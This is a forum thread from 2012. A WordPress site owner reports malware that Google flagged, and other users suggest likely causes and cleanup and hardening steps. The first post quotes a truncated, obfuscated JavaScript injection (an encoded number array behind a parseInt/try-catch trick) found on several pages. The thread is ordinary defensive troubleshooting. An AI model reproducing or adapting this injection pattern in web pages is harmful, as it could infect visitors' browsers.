Malware on wordpress site

paulcj2 · April 6, 2012, 12:15pm

Twice now within one month Google Webmaster Tools has reported malware on my client’s site [noparse]www.beverlyhaberman.com[/noparse]. The first time I completely removed and re-loaded all the files. This time I’d like to get to the root cause of the malware.

What is the source of this infection?
How can I prevent this from happening again?
Is there some way I can get rid of the infection short of removing and re-installing the files again?

Here are the malware details according to Google Webmaster Tools.

Last checked: April 5, 2012

Suspected injected code at
URL: [noparse]http://beverlyhaberman.com/[/noparse]

<script>c=3-1;i=c-2;if(window.document)if(parseInt("0"+"123"
)===83)try{new String("asd").prototype.q}catch(egewgsd){f=['
-31i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i68i
......

Suspected injected code at
URL: [noparse]http://beverlyhaberman.com/workplace-productivity/[/noparse]

<script>c=3-1;i=c-2;if(window.document)if(parseInt("0"+"123"
)===83)try{new String("asd").prototype.q}catch(egewgsd){f=['
-31i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i68i
......

Suspected injected code at
URL: [noparse]http://beverlyhaberman.com/workplace-productivity/the-energy-of-yes[/noparse]

<script>c=3-1;i=c-2;if(window.document)if(parseInt("0"+"123"
)===83)try{new String("asd").prototype.q}catch(egewgsd){f=['
-31i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i68i
......

EastCoast · April 6, 2012, 9:06pm

Could be any number of reasons, most of which have been discussed in depth here before (try a search for ‘hacked’ ‘virus’ or similar)

out of date wordpress install
out of date plugin
insecure plugin
- using a free template downloaded from a secondary source
file permissions set insecurely
ftp hijacked by virus
insecure shared hosting

As to which one it is, this is a process of elimination. If you’re on shared hosting you’re less likely to get to the bottom of it, as you probably won’t have access to the logs necessary to examine what’s happened in detail.

techmichelle · April 9, 2012, 3:12pm

check out this wordpress article on sitepoint

Plus check into your wordpress hosting company. Lots of hosting companies allow wordpress to be installed, but have you are responsible for …

smartobject2 · April 11, 2012, 4:42am

Something is putting that line of code at the top of your pages - probably the index.php file(s). But more important - that “something” will keep putting the hack code back unless you do a complete clearing out as recommended in the referenced articles.

Instead of trying to locate source of the recurrence, just wipe the site, re-install Wordpress + plugins and harden the site as mentioned.

Cheers,
Let me know how it goes.

paulcj2 · April 18, 2012, 9:04pm

When you mean completely wipe out the site, do you mean the database as well, or just the files?

Mittineague · April 19, 2012, 4:32am

Don’t just wipe it - save a backup of your database or you’ll lose your posts and comments.

Then virus scan it. And if you can’t get new plugins and the theme your using scan those too.

Scan your own machine, change passwords, install a fresh most recent version of WordPress etc. etc. The codex has a good page “Hardening WordPress” if I remember correctly.

musaddique · April 23, 2012, 5:09am

Keep backup data always. Other thing is to remove this injected code from all php files. i guess php files have this script injection. The main thing is secure password. Frequently, change your passwords and have strong one.